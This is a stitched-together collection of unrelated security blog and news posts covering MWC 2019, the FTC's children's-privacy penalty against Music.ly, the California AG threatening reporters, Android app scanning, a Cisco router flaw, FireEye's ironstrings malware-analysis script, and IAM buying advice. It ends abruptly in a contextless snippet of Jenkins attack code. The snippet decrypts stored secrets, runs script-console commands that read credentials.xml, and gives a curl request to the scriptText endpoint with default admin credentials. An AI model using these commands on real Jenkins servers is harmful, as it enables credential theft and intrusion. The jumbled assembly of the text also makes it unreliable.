The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:
Foldable Phones Are the Future
MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they certainly delivered this year. One device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends inward so that it closes like a book. Although neither device is available to the public yet, both have made a bold statement when it comes to smartphone design.
Smart Home Technology Goes Mobile
Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.
Enhancing the Gaming Experience with 5G, VR, and AR
Not to be shown up, game developers also made a statement by using 5G technology to bring gamers into a more immersive gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Unite app, is already working on games that will require a 5G upgrade. One prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each player’s phone shows the game’s graphics superimposed on the real world and allows players to shoot each other, duck and dodge, and pick up virtual items, all in real time.
Niantic wasn’t the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony’s upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, a player in the Nokia booth was able to race another player in the Intel booth as if the two were swinging through spiderwebs in Manhattan. Players got a taste of how the next generation of wireless technology will let them take part in highly immersive gaming experiences.
Bringing 4G and 5G to the Automotive Industry
Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to its automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the platforms’ main features is cellular vehicle-to-everything (C-V2X) communication, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. They also include features like multi-gigabit cloud connectivity, high-bandwidth, low-latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity could help future vehicles improve safety, communications, and the overall in-car experience for consumers.
Securing Consumers On-the-Go
The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. In addition, they also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.
And while consumers must take the necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part to help users everywhere remain secure. For instance, we’ve recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we’re working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and to provide McAfee Safe Family protection for Türk Telekom’s fixed and mobile broadband customers.
While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.
The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.
On February 27, 2019, the Federal Trade Commission announced a record $5.7 million civil penalty against popular video creation and sharing app Music.ly (now known as TikTok) for violations of U.S. children’s privacy rules. According to the FTC’s complaint, Music.ly is designed to appeal to young children (among others), and the company was aware that a significant percentage of Music.ly users were children under the age of 13. The FTC also alleged that Music.ly gained actual knowledge of underage use from parents who unsuccessfully sought to have their children’s information deleted. Under the FTC’s settlement, in addition to paying the penalty, Music.ly must destroy or obtain parental consent for all previously improperly collected children’s information.
The California Attorney General’s office is threatening reporters with legal action merely for possessing a list of the state’s law enforcement officers who have been convicted of crimes — a list obtained through a public records request.
In a Jan. 29 letter to journalists Jason Paladino and Robert Lewis, California Attorney General Xavier Becerra’s office called possession of the list a crime.
“You are hereby on notice that the unauthorized receipt or possession of a record from the Department's ACHS or information obtained from such a record is a misdemeanor. (Pen. Code § 11143.),” reads the letter from Becerra’s office.
The letter demanded that the reporters destroy the list and refrain from disseminating it, and threatened that “[i]f you do not intend to comply with our request, the Department can take legal action to ensure that the spreadsheets are properly deleted and not disseminated.”
Lewis and Paladino both said that they will not comply with the order to destroy the record.
Lewis was doing some reporting on police officers who had been arrested, and became interested in which agencies might have records that could illuminate how frequently this happens. Around the same time, Paladino sought data that would shed light on when police officers were disqualified from their positions due to being convicted of crimes.
The reporters — both affiliated with UC Berkeley’s Investigative Reporting Program (IRP) — filed similar requests under California’s public records law in December with the Commission on Peace Officer Standards and Training (POST).
“In January, I got an email that said, ‘Here are the records,’” said Lewis. “But they sent us something we didn’t ask for — it was some sort of redacted training program, completely unrelated to the request. I reached back out and said that they sent the wrong thing, and they said, ‘Sorry, here is the correct document.’”
Lewis and Paladino received a list of 12,000 names of current and former California police officers, as well as police applicants, who were convicted of crimes. In their report about the list and Becerra’s legal threats for the East Bay Times, they noted that the list included Greg Jeong — who was convicted of impersonating a police officer after failing a police field training program — and Hayward police officer Joshua Cannon, who was convicted of driving under the influence and remains on the force.
While Becerra’s office and POST both sent letters to Lewis and Paladino claiming that the record was released “inadvertently,” it was only disclosed after much back and forth between POST and the reporters.
“It’s not like someone clicked ‘send’ on the wrong thing! They did that the first time!” said Paladino, referring to POST initially emailing the reporters an unrelated record.
“As a reporter, I had the Marine Corps once give me documents that were not fully redacted involving a crash that happened. They weren’t sending me intimidating legal letters; they called me and said they messed up, and asked me not to make protected information public, like people’s names.”
In contrast, Becerra’s office has chosen to respond by threatening reporters with an injunction and even criminal charges.
David Snyder, an attorney at the First Amendment Coalition, said he had never heard of a case like this, and told Freedom of the Press Foundation that two aspects of Becerra’s legal threat are highly unusual:
“One is the somewhat veiled threat to criminally prosecute them for mere possession of this data. And the second is the less veiled threat to get a court order — an injunction — to prevent publication of it,” Snyder said. “As for the first, which says that it’s a misdemeanor to possess the list, the Supreme Court has made clear that if a journalist or anyone else lawfully receives information, they are protected from civil liability for publishing it. And the threat to bring criminal charges is totally groundless under the First Amendment,” he continued.
Snyder also noted that “the California statute that is cited in the letter specifically carves out journalists — that statute that they rely on, consistent with the First Amendment, says you can’t charge journalists with this kind of activity.”
Courts have generally held that a prior restraint in the form of a court order prohibiting publication is an unconstitutional violation of the First Amendment. Cases in both the U.S. Supreme Court and the California Supreme Court indicate any prosecution here would also be unconstitutional.
In a statement provided to Freedom of the Press Foundation on Wednesday, a spokesman for the California Department of Justice doubled down on the contention that the journalists are breaking the law:
“The UC Berkeley Investigative Reporting Program is not an entity permitted to possess or use this confidential data. The UC Berkeley Investigative Reporting Program chose to publish the confidential information of Californians despite being alerted by the Department of Justice that doing so was prohibited by law.”
But as Paladino noted, the list is, fundamentally, public information. “It’s just convictions, not arrests,” he said. “Maybe there could be more of a privacy concern if they weren’t convictions. But anyone can walk into a courthouse, search the name of a cop, and see what's on the record. It’s summarized public information.”
And aside from the three examples of police officer convictions noted in the East Bay Times report, the list has not been published in any broad sense.
“Part of the reason we haven’t published is to do due diligence,” Lewis said. “I’ve been a reporter for a number of years, and I’ve done some pretty tough stories, but this is the first time I’ve ever been threatened by a top law enforcement official in this way. It was pretty stunning to me, and it continues to be.”
When Freedom of the Press Foundation followed up with the AG’s office to clarify whether they recognize any of the serious First Amendment concerns with their letter, a spokesperson passed along a statement from Attorney General Becerra himself:
“We always strive to balance the public’s right to know, the need to be transparent and an individual’s right to privacy. In this case, information from a database that’s required by law to be confidential was released erroneously, jeopardizing personal data of individuals across our state. No one wants to shield criminal behavior; we’re subject to the rule of law.”
His response included no reference to the First Amendment.
Posted by Patrick Mutchler and Meghan Kelly, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]
Helping Android app developers build secure apps, free of known vulnerabilities, means helping the overall ecosystem thrive. This is why we launched the Application Security Improvement Program five years ago, and why we're still so invested in its success today.
What the Android Security Improvement Program does
When an app is submitted to the Google Play store, we scan it to determine if a variety of vulnerabilities are present. If we find something concerning, we flag it to the developer and then help them to remedy the situation.
Think of it like a routine physical. If there are no problems, the app runs through our normal tests and continues on the process to being published in the Play Store. If there is a problem, however, we provide a diagnosis and next steps to get back to healthy form.
Over its lifetime, the program has helped more than 300,000 developers to fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users with the same security issues present, which we consider a win.
What vulnerabilities are covered
The App Security Improvement program covers a broad range of security issues in Android apps. These can be as specific as security issues in certain versions of popular libraries (ex: CVE-2015-5256) and as broad as unsafe TLS/SSL certificate validation.
We are continuously improving this program's capabilities by refining the existing checks and launching checks for more classes of security vulnerabilities. In 2018, we deployed warnings for six additional security vulnerability classes, including:
- SQL Injection
- File-based Cross-Site Scripting
- Cross-App Scripting
- Leaked Third-Party Credentials
- Scheme Hijacking
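To make the first class on that list concrete, here is a minimal Python sketch (not Android code; the table schema and function names are invented for illustration) contrasting string-built SQL, which is injectable, with a parameterized query:

```python
import sqlite3

def find_user_unsafe(conn, username):
    # Vulnerable: attacker-controlled input is spliced into the SQL text,
    # so a username like "x' OR '1'='1" changes the query's meaning.
    query = "SELECT id FROM users WHERE name = '%s'" % username
    return conn.execute(query).fetchall()

def find_user_safe(conn, username):
    # Safe: the ? placeholder keeps the input as data, never as SQL syntax.
    return conn.execute("SELECT id FROM users WHERE name = ?", (username,)).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

payload = "x' OR '1'='1"
print(len(find_user_unsafe(conn, payload)))  # 1: the injected OR clause matched every row
print(len(find_user_safe(conn, payload)))    # 0: no user is literally named the payload
```

The same principle applies on Android, where the fix is typically to use the platform's parameterized query APIs rather than concatenating user input into SQL strings.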
Ensuring that we're continuing to evolve the program as new exploits emerge is a top priority for us. We are continuing to work on this throughout 2019.
Keeping Android users safe is important to Google. We know that app security is often tricky and that developers can make mistakes. We hope to see this program grow in the years to come, helping developers worldwide build apps users can truly trust.
Cisco is warning organizations that have deployed a particular Cisco wireless firewall, VPN device, or router for remote users to patch a critical vulnerability in each that could let attackers break into the network.
The vulnerability, which has an impact rating of 9.8 out of 10 on the Common Vulnerability Scoring System lets a potential attacker send malicious HTTP requests to a targeted device. A successful exploit could let the attacker execute arbitrary code on the underlying operating system of the affected device as a high-privilege user, Cisco stated.
The vulnerability is in the web-based management interface of three products: Cisco’s RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router and RV215W Wireless-N VPN Router. All three products are positioned as remote-access communications and security devices.
Recently we came across a malicious campaign injecting scripts that push fake browser updates onto site visitors.
This is what a typical fake update request looks like:
Users see a message box claiming to be an “Update Center” for their browser type (in my case it was Firefox, but the campaign serves similar messages for the Chrome, Internet Explorer, and Edge browsers).
The message reads: “A critical error has occurred due to the outdated version of the browser.”
The Silent Threat: Third Party Cyber Risk
Third party risk is now a common and dangerous issue, costing organizations around the globe an estimated $10 billion. Trying to solve this security issue with one-time risk assessments or security scorecards isn’t enough. Organizations need visibility, as well as continuous risk monitoring with real-time alerts to stay ahead of their vendors’ vulnerabilities.
In this white paper, we discuss the dangers of third party risk and answer the following questions:
- Why are third party attacks so common and powerful?
- How do I close the third party visibility gap?
- Why is continuous monitoring essential to combating third party risk?
Download The White Paper:
The Silent Threat: Third Party Cyber Risk
This blog post continues our Script Series where the FireEye Labs Advanced Reverse Engineering (FLARE) team shares tools to aid the malware analysis community. Today, we release ironstrings: a new IDAPython script to recover stackstrings from malware. The script leverages code emulation to overcome this common string obfuscation technique. More precisely, it makes use of our flare-emu tool, which combines IDA Pro and the Unicorn emulation engine. In this blog post, I explain how our new script uses flare-emu to recover stackstrings from malware. In addition, I discuss flare-emu’s event hooks and how you can use them to easily adapt the tool to your own analysis needs.
Analyzing strings in binary files is an important part of malware analysis. Although simple, this reverse engineering technique can provide valuable information about a program’s use and its capabilities. This includes indicators of compromise like file paths and domain names. Especially during advanced analysis, strings are essential to understand a disassembled program’s functionality. Malware authors know this, and string obfuscation is one of the most common anti-analysis techniques reverse engineers encounter.
Due to the prevalence of obfuscated strings, the FLARE team has already developed and shared various tools and techniques to deal with them. In 2014, we published an IDA Pro plugin to automate the recovery of constructed strings in malware. In 2016, we released FLOSS, a standalone open-source tool to automatically identify and decode strings in malware.
Both solutions rely on vivisect, a Python-based program analysis and emulation framework. Although vivisect is a robust tool, it may fail to completely analyze an executable file or emulate its code correctly. And just like any tool, vivisect is susceptible to anti-analysis techniques. With missing, incomplete, or erroneous processing by vivisect, dependent tools cannot provide the best results. Moreover, vivisect does not provide an easy-to-use graphical interface to interactively change and enhance program analysis.
I encountered all these shortcomings recently, when I analyzed a GandCrab ransomware sample (version 5.0.4, SHA256 hash: 72CB1061A10353051DA6241343A7479F73CB81044019EC9A9DB72C41D3B3A2C7). The malware contains various anti-analysis techniques to hinder disassembly and control-flow analysis. Before I could perform any efficient reverse engineering in IDA Pro, I had to overcome these hurdles. I used IDAPython to remove various anti-analysis instruction patterns which then allowed the disassembler to successfully identify all functions in the binary. Many of the recovered functions contained obfuscated strings. Unfortunately, my changes did not propagate to vivisect, because it performs its own independent analysis on the original binary. Consequently, vivisect still failed to recognize most functions correctly and I couldn’t use one of our existing solutions to recover the obfuscated strings.
While I could have tried to feed my patches in IDA Pro back to vivisect or to create a modified binary, I instead created a new IDAPython script that does not depend on vivisect, thus circumventing the shortcomings mentioned above. It uses IDA Pro’s program analysis and Unicorn’s emulation engine; the easy integration of these two tools is powered by flare-emu.
Using IDA Pro instead of vivisect resolves multiple limitations of our previous implementations. Now changes that users make in their IDB file, e.g. by patching instructions to manually enhance analysis, are immediately available during emulation. Moreover, the tool more robustly supports different architectures including x86, AMD64, and ARM.
Stackstrings: An Example
The disassembly listing in Figure 1 shows an example of string obfuscation from the sample I analyzed. The malware creates a string at run time by moving each character into adjacent stack addresses (gray highlights). Finally, the sample passes the string’s starting offset as an argument to the InternetOpen API call (blue highlight). Manually following these memory moves and restoring strings by hand is a very cumbersome process, especially when malware complicates the value assignments with additional instructions, as illustrated below.
Figure 1: Disassembly listing showing stackstring creation and usage
Because malware often uses stack memory to create such strings, Jay Smith coined the term stackstrings for this anti-analysis technique. Note that malware can also construct strings in global memory. Our new script handles both cases: strings constructed on the stack and in global memory.
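As a toy illustration (in Python rather than assembly, with an invented buffer and string), this is essentially what the per-character moves in Figure 1 accomplish at run time: the finished string never appears as contiguous bytes in the binary on disk, only in memory after the writes execute.

```python
def build_stackstring():
    """Mimic the per-character mov instructions that assemble a stackstring.

    In the compiled binary each character is a separate immediate operand,
    so a static strings scan of the file never sees "kernel32.dll" whole.
    """
    buf = bytearray(16)  # stand-in for a local stack buffer
    for i, ch in enumerate("kernel32.dll\x00"):
        buf[i] = ord(ch)  # one "mov [ebp+i], ch" per character
    return bytes(buf)

raw = build_stackstring()
print(raw.split(b"\x00")[0].decode())  # kernel32.dll
```

Only after emulating (or executing) the writes does the buffer contain the recoverable string, which is why emulation-based recovery works where static extraction fails.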
ironstrings: Stackstring Recovery Using flare-emu
The new IDAPython script is an evolution of our existing solutions. It combines FLOSS’s stackstring recovery algorithm with functionality from our IDA Pro plugin. The script relies on IDA Pro’s program analysis and emulates code using Unicorn; the combination of both tools is powered by flare-emu. “Fe,” short for flare-emu, is also the chemical symbol for iron, hence the script’s name: ironstrings.
To recover stackstrings, ironstrings enumerates all disassembled functions in a program except for library and thunk functions as identified by IDA Pro. For each function, the script emulates various code paths through the function and searches for stackstrings based on two heuristics:
- Before all call instructions in the function, as stackstrings are often constructed and then passed to other functions, e.g., Windows APIs like CreateFile or InternetOpenUrl.
- At the end of a basic block containing more than five memory writes. The number of memory writes is configurable. This heuristic is helpful if the same memory buffer is used multiple times in a function and if the string construction spans multiple basic blocks.
If any of these conditions apply, the script searches the function’s current stack frame for printable ASCII and UTF-16 strings. To detect strings in global memory, the script additionally searches for strings in all memory locations that have been written to.
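The actual extraction logic in FLOSS and ironstrings is more involved, but a minimal standalone sketch of the idea, scanning a raw memory snapshot for printable ASCII and UTF-16LE runs, might look like this (the regexes and the four-character minimum length are illustrative assumptions, not the tools' exact heuristics):

```python
import re

ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")          # runs of printable ASCII
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")  # printable UTF-16LE runs

def extract_strings(mem):
    """Pull candidate ASCII and UTF-16LE strings out of a raw memory snapshot."""
    found = [m.group().decode("ascii") for m in ASCII_RE.finditer(mem)]
    found += [m.group().decode("utf-16le") for m in UTF16_RE.finditer(mem)]
    return found

# Simulated stack frame: junk bytes interleaved with two constructed strings.
stack = (b"\x00\x01GET\x00\xff"
         + "wininet.dll".encode("utf-16le")
         + b"\xff\x90/index.php\x00")
print(extract_strings(stack))  # ['/index.php', 'wininet.dll']
```

In ironstrings, this kind of scan runs against the emulated stack frame (and against all written global memory locations) at the trigger points described above.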
Using flare-emu Hooks to Recover Stackstrings
If you’re not already familiar with flare-emu, I recommend reading our previous blog post. It discusses some of the interfaces the tool provides. Other helpful resources are the examples and the project documentation available on the flare-emu GitHub.
The stackstrings script uses flare-emu’s iterateAllPaths API, which iterates multiple code paths through a function. It first finds possible paths from function start to function end, then forces emulation down each identified code path independent of the actual program state. This extensive code coverage allows ironstrings to recover strings constructed across many different emulation runs.
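flare-emu’s real path enumeration is more sophisticated, but the core idea can be sketched as a depth-first search over a control-flow graph. The graph encoding, the path limit, and the loop handling below are illustrative assumptions, not flare-emu’s implementation:

```python
def find_paths(cfg, start, end, limit=64):
    """Enumerate simple paths from start to end in a control-flow graph.

    cfg maps a basic-block id to the ids of its successor blocks. Loops are
    handled by never revisiting a block within one path, and `limit` caps
    the number of paths so pathological graphs stay tractable.
    """
    paths, stack = [], [(start, [start])]
    while stack and len(paths) < limit:
        node, path = stack.pop()
        if node == end:
            paths.append(path)
            continue
        for succ in cfg.get(node, []):
            if succ not in path:  # skip back-edges (loops)
                stack.append((succ, path + [succ]))
    return paths

# A diamond-shaped function: entry -> (then | else) -> exit
cfg = {0: [1, 2], 1: [3], 2: [3], 3: []}
print(find_paths(cfg, 0, 3))  # [[0, 2, 3], [0, 1, 3]]
```

Emulating each returned path in turn, regardless of whether the branch conditions would actually be satisfied, is what gives the tool its broad code coverage.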
A key feature of flare-emu is its set of hook functions that are triggered by different emulation events. These hooks, or callbacks, enable the development of very powerful automation tasks. The available hooks are a combination of Unicorn’s standard hooks, e.g., to hook memory access events, and multiple convenience hooks provided by flare-emu. The following section briefly describes the available callbacks in flare-emu and illustrates how the ironstrings script uses them to recover obfuscated strings.
- instructionHook: This Unicorn standard hook is triggered before an instruction is emulated. ironstrings uses this hook, for example, to initiate stackstring extraction once a basic block has accumulated enough memory writes.
- memAccessHook: This Unicorn standard hook is triggered when memory read or write events occur during emulation. In the stackstrings script this function stores data about all memory writes.
- callHook: This flare-emu hook is activated before each function call. The hook’s return value is ignored. In the stackstrings script this hook triggers the extraction of stackstrings.
- preEmuCallback: This flare-emu hook is called before each emulation run. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. ironstrings does not use this hook.
- targetCallback: This flare-emu hook gets called whenever one of the specified target addresses is hit. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. The stackstrings script does not use this hook.
The code in Figure 2 shows the callback functions that flare-emu’s API currently supports, their signatures, and examples of how to use them. All callbacks receive an argument named hookData. This named dictionary allows the user to provide application-specific data to use before, during, and after emulation. Often, this dictionary is named userData in the user-defined callbacks, as in the examples below, due to its naming in Unicorn. ironstrings uses it to access function analysis data and to store recovered strings across its various hooks. The dictionary also provides access to the EmuHelper object and emulation metadata.
Figure 2: flare-emu example hook implementations
Note that both flare-emu and ironstrings were written using the new IDAPython API available in IDA Pro 7.0 and higher. They are not backwards compatible with previous program versions.
Usage and Options
To run the script in IDA Pro, go to File – Script File... (ALT+F7) and select ironstrings.py. The script runs automatically on all functions, prints its results to IDA Pro's output window, and adds comments at the locations where it recovered stackstrings. Figure 3 shows the script’s output of the recovered stackstring locations from the GandCrab sample. Analysis of this malware takes the script about 15 seconds.
Figure 3: Deobfuscated stackstrings and locations where they were identified
Figure 4 shows the disassembly listing of the stackstring creation example discussed at the beginning of this post after running ironstrings.
Figure 4: Commented stackstring after running ironstrings
After analyzing a sample, the script provides a summary and a unique listing of all recovered strings. The output for the ransomware sample is shown in Figure 5. Here the tool failed to analyze two functions due to invalid memory operations during Unicorn’s code emulation.
Figure 5: Script summary and unique string listing
Note that you can modify various options to change the script’s behavior. For example, you can configure the output format at the top of the ironstrings.py file. The script’s README file explains the options in more detail.
This blog post explains how our new IDAPython script ironstrings works and how you can use it to automatically recover stackstrings in IDA Pro. Overcoming anti-analysis techniques is just one of many useful applications of code emulation for malware analysis. This post shows that flare-emu provides the ideal base for this by integrating IDA Pro and Unicorn. The detailed discussion of flare-emu’s hook functions will help you to write your own powerful automation scripts. Please reach out to us with questions, suggestions and feedback via the flare-emu and flare-ida GitHub issue trackers.
Is your enterprise in the midst of a digital transformation? Of course it is. Doing business in today’s global marketplace is more competitive than ever. Automating your business processes and infusing them with always-on, real-time applications and other cutting-edge technology is key to keeping your customers happy, attracting and retaining good workers, transacting with your partners, and growing your business.
A transformation this sweeping doesn’t happen overnight, though. Mission-critical applications and processes can’t be swapped for new ones without risk to your bottom line. While enterprises are moving to hosted applications or virtualized software on Infrastructure as a Service (IaaS) platforms such as AWS or Microsoft Azure, the reality is that it will take many years for most of them to become all-cloud, if they ever do.
In other words, many, if not most enterprises have a hybrid IT infrastructure. And that’s not going to change for many years.
In the meantime, you need security strong enough to protect your business and agile enough to cover your transforming infrastructure. That’s why Imperva has introduced a simpler way for organizations to deploy our family of security products and services, which we call FlexProtect. FlexProtect comes in three different plans: FlexProtect Pro, FlexProtect Plus, and FlexProtect Premier.
With the FlexProtect Plus and Premier plans, our analyst-recognized application and data security solutions protect your applications and data even as you migrate them from on-premises data centers to multiple cloud providers. Don’t let complicated, inflexible security licenses slow down your cloud migration. FlexProtect provides simple and predictable licensing that covers your entire IT infrastructure, even if you use multiple clouds for IaaS, and even as you move workloads between on-premises and clouds. With our powerful security analytics solutions available in all FlexProtect plans, you also have the visibility and control you need to help you manage your security wherever your assets are.
Imperva also offers a third option, FlexProtect Pro. This brings together five powerful SaaS-based Application Security capabilities to protect your edge from attack: Cloud WAF, Bot Protection, IP Reputation Intelligence, our Content Delivery Network (CDN) as well as our powerful Attack Analytics solution, which turns events into insights you can act on. FlexProtect Pro gives businesses simple application security delivered completely as a service.
Imperva is in the midst of its own transformation — learn more about the New Imperva here. That gives us keen insight into the challenges with which our customers are grappling. And that’s why we developed FlexProtect licensing, in order to better defend your business and its growth, wherever you are on your digital transformation journey. You’ll never have to choose between innovating for your customers and protecting what matters.
To learn more about FlexProtect, meet us at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and hear directly from Imperva experts. You can also see a demo of our latest products in the areas of cloud app and data security and data risk analytics.
Imperva will also be at the AWS booth (1227 in the South Expo hall). On Tuesday, March 5, from 3:30 to 4:00 pm, you’ll be able to hear how one of our cloud customers, a U.S.-based non-profit with nearly 40 million members, uses Imperva Autonomous Application Protection (AAP) to detect and mitigate potential application attacks. You can also see a demo of how our solutions work in cloud environments on Tuesday, March 5, from 3:30 to 5:00 pm and Wednesday, March 6, from 11:30 am to 2:00 pm.
Finally — I will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” during RSA. It will be broadcast live at 9:30 am on March 6th and feature a Q&A discussion with several cybersecurity executives as they discuss the possibility of a cyber battle between AI systems, which some experts predict might be on the horizon in the next three to five years. Register and watch the live feed or recording for free!
Time and time again, organizations learn the hard way that no matter which security solutions they have in place, if they haven’t properly secured the end user, their efforts can be easily rendered moot.
The classic slip-up most often associated with end-user-turned-insider-threat is falling for a phishing email that in turn infects the endpoint. Now imagine that end user is someone with access to highly-sensitive information.
In a recently released report, Forrester noted that 80 percent of data breaches are related to compromised privileged credentials, highlighting the need for secure identity and access management (IAM).
IAM is a framework of policies and technologies that ensure that the proper people in an enterprise have the appropriate access to resources. Identity and access management products provide IT managers with the tools necessary to control user access to critical information within an organization, whether that’s employees or customers. IAM tools help define and manage the roles and access privileges of individual network users, as well as the circumstances in which users are granted (or denied) those privileges.
Therefore, having a strong identity and access management solution is critical to the security of your organization. It ensures that the right people have access to your system—and keeps unauthorized users out.
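The role-and-permission model described above can be sketched in a few lines; the roles, permissions, and user names in this Python illustration are purely hypothetical:

```python
# Minimal sketch of role-based access control (RBAC), the model most IAM
# tools implement: users map to roles, roles map to permissions.
ROLE_PERMISSIONS = {
    "analyst": {"read:reports"},
    "admin": {"read:reports", "write:reports", "manage:users"},
}

USER_ROLES = {
    "alice": {"admin"},
    "bob": {"analyst"},
}

def is_authorized(user: str, permission: str) -> bool:
    """Grant access only if one of the user's roles carries the permission."""
    roles = USER_ROLES.get(user, set())
    return any(permission in ROLE_PERMISSIONS.get(r, set()) for r in roles)

print(is_authorized("alice", "manage:users"))    # admins can manage users
print(is_authorized("bob", "manage:users"))      # analysts cannot
print(is_authorized("mallory", "read:reports"))  # unknown users get nothing
```

Real IAM products layer the "circumstances" dimension mentioned above (device, network, time of day) on top of this basic role check.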
When it comes to an IAM solution, organizations have two basic options: build it or buy it. How do you know which option is the right one for your business? Here are the factors you need to consider.
When deciding between building and buying an access management solution, the first step is to assess the company’s cybersecurity needs and potential risks. A good question to ask is: What’s at stake if your organization is compromised or breached? Are you in a field that regularly manages private or sensitive proprietary data, such as genetic research or wealth portfolio management? Do you store large databases of customers’ personally identifiable information (PII)? Consider what the consequences would be if an unauthorized person gained access to your system.
Once you’ve assessed the company’s risk, consider whether your development team could build in the security safeguards needed to manage those risks. If you have especially complex or demanding security needs, building the necessary protections into your existing system will be more difficult.
If your in-house engineering team does not have security experience, consider partnering with third parties for security testing, audits, and other services. Having a trusted third party look at your system can help ensure your security measures are sufficient.
Another factor to consider is whether you partner with any other third parties, such as software-as-a-service providers, that enable features within your system. If so, you’ll need to assess the security aspects of these third parties as well and whether they could better integrate with a homemade or other third-party solution.
Capabilities and available resources
Even if your development staff is skilled, keep in mind that building an access management solution requires a specific skill set. Evaluate the skills, knowledge, and background of your current team members and consider whether you would need to hire additional staff to complete the build.
Building your own solution will also take a considerable amount of time. Do you have enough development resources for this project? Even if you do, think about whether building an IAM solution is the most high-value task your team could be working on. There may be more profitable projects you want to prioritize, especially because so many pre-built solutions are available.
Remember, too, that building your solution won’t be a one-time investment. You’ll also have to dedicate time and resources to maintaining and updating your system.
The best option for your organization depends in part on which resource you have more of—time or money. If you have funding but not time, a pre-built solution is likely best. If your situation is reversed, building your own solution may save you money, provided you have the capabilities needed to build an adequate program.
Complexity of the solution
The complexity of the solution you need will also influence whether or not it’s possible to build your own with the resources and capabilities you have. If you only have one or two simple applications and a small number of users, you may be able to build a system on your own relatively easily.
If, however, your system includes large numbers of applications and users with a wide range of necessary privileges, building and maintaining an access management solution will be more challenging.
Also, consider the potential that your company might expand the number of applications or users in the near future. Is your company likely to grow substantially within the next few years? If it does, can your custom-built solution scale? Can a third-party solution do the same?
Third-party verification needs
Another consideration is the possible need for third-party verification, industry standards compliance, and regulatory compliance. You might be subject to certain rules based on your sector, location, or the type of data you handle. Ensuring you comply with these requirements adds an extra layer of complication to building or buying a solution.
Pre-built systems, however, may already comply with the necessary standards. Make sure you have a thorough understanding of all compliance requirements that impact you before you begin building a solution or looking for one to purchase.
Timeline
How quickly does your access management solution need to be up and running? If it’s a matter of security, that timeframe might be significantly shorter.
Building an access management solution is a time-intensive process, so if you need your solution to be ready quickly, this is not the best option. Purchasing a pre-built solution will enable you to roll out your new access management solution much more quickly than building one on your own would.
To build or to buy
Your identity and access management solution will be an important component for the security and accessibility of your system, both for employees and customers. It’s crucial that you employ a solution that adequately meets your organization’s needs. That’s why choosing between building and buying an access management solution is such an important decision.
To ensure you choose the right option, make sure you ask the right questions when evaluating the needs of your organization.
The post Key considerations for building vs. buying identity access management solutions appeared first on Malwarebytes Labs.
passwd = hudson.util.Secret.decrypt(hashed_pw)
You need to perform this on the Jenkins system itself, as it's using the local master.key and hudson.util.Secret
Code to get the credentials.xml from the script console
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c type credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cat credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
If you just want to do it with curl you can hit the scriptText endpoint and do something like this:
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"
